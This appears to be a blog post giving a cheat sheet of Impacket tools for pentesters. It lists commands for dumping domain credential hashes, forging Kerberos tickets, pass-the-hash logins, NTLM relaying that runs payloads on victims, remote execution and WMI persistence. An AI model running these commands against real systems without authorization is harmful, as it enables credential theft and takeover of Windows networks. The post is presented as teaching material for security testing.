Impacket Cheat Sheet for Pentesters

About Impacket

Impacket is a collection of Python classes for working with network protocols. It’s widely used in penetration testing for exploiting various Windows protocols. This cheat sheet summarizes its most useful tools with quick commands and tips.

General Authentication Options

-hashes LMHASH:NTHASH      # NTLM hashes
-no-pass                  # Don’t ask for password
-k                        # Use Kerberos (from ccache)
-aesKey          # AES key for Kerberos auth (128/256-bit)

Connection Options

-dc-ip                # IP of the domain controller
-target-ip           # IP of the target machine

Remote Execution

Techniques that run commands remotely via SMB, WMI, or services:

smbexec.py domain/user:password@target
wmiexec.py domain/user:password@target
tshell.py domain/user:password@target

Kerberos Attacks

Kerberos-focused tools and golden ticket tricks:

ticketer.py -nthash  -domain-sid  -domain  -user 
getTGT.py domain/user:password
getST.py -spn  domain/user:password

Windows Secrets Dumping

secretsdump.py -ntds /root/ntds.dit -system /root/system LOCAL
secretsdump.py -just-dc-ntlm domain/user:pass@target
secretsdump.py -just-dc-ntlm domain/user@target -hashes LM:NTHASH

Mimikatz RPC Client

mimikatz.py domain/user:password@IP
mimikatz.py -dc-ip 10.10.2.1 -target-ip 10.10.2.3 domain/user:password

MiTM & Relaying

responder.py -I eth0 -r -d -w
ntlmrelayx.py -tf targets.txt
ntlmrelayx.py -tf targets.txt -c "ipconfig"

SMB Servers

karmaSMB.py filename
smbserver.py SHARENAME /path/to/share
smbserver.py SHARENAME /path/to/share --username user --password pass

WMI Usage

wmiquery.py domain/user:password@IP
SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152
wmipersist.py domain/user:password@IP install
wmipersist.py domain/user:password@IP remove

Vulnerabilities & Exploits

goldenPac.py domain/user:password@IP
sambaPipe.py -dc-ip 10.10.2.1 -target-ip 10.10.2.3 domain/user:password -so shell.so
smbrelayx.py -h victimIP -c cmd.exe
smbrelayx.py -h victimIP -e payload.exe

SMB/MSRPC Modules

smbclient.py domain/user:password@IP
getArch.py -target 10.10.2.2
rpcdump.py domain/user:password@IP
ifmap.py 10.10.20.1 135
opdump.py 10.10.1.1 135 UUID version
samrdump.py SERVER/Administrator:T00r@192.168.1.140
services.py SERVER/Administrator:T00r@192.168.1.140 start
netview.py domain/user:password -target 192.168.10.2
reg.py domain/user:password@IP query -keyName HKLM\\SOFTWARE\\Policies
lookupsid.py domain/user:password@IP

MSSQL / TDS Tools

mssqlinstance.py 192.168.1.2
mssqlclient.py -windows-auth domain/user@host

File Format Analysis

esentutl.py dbfile {dump,info,export}
ntfs-read.py "\\C:"
ntfs-read.py "\\C:" -extract "\\windows\\system32\\config\\sam"
registry-read.py registryHive enum_key

Other Useful Tools

GetADUsers.py domain/user:password@IP
mqtt_check.py domain/user:password@IP -ssl
rdp_check.py domain/user:password@IP
rdp_check.py domain/user@IP -hashes LMHASH:NTHASH
sniffer.py {tcp, udp, icmp}
ping.py <src-ip> <dst-ip>
ping6.py <src-ip> <dst-ip>

Final Notes

Some commands require administrative privileges. Always test in lab environments first. Impacket evolves quickly—check the GitHub repo for the latest updates.

I’ve mapped out hundreds of ethical hacking courses, books, and tools to get you started.
👇 Check the full roadmap and level up. 👇

Ethical Hacker Roadmap

Find this helpful? Share it with others!
Leave a Reply

Filed under: Ethical Hacking - @ June 8, 2025 2:11 am

Tags: , , , ,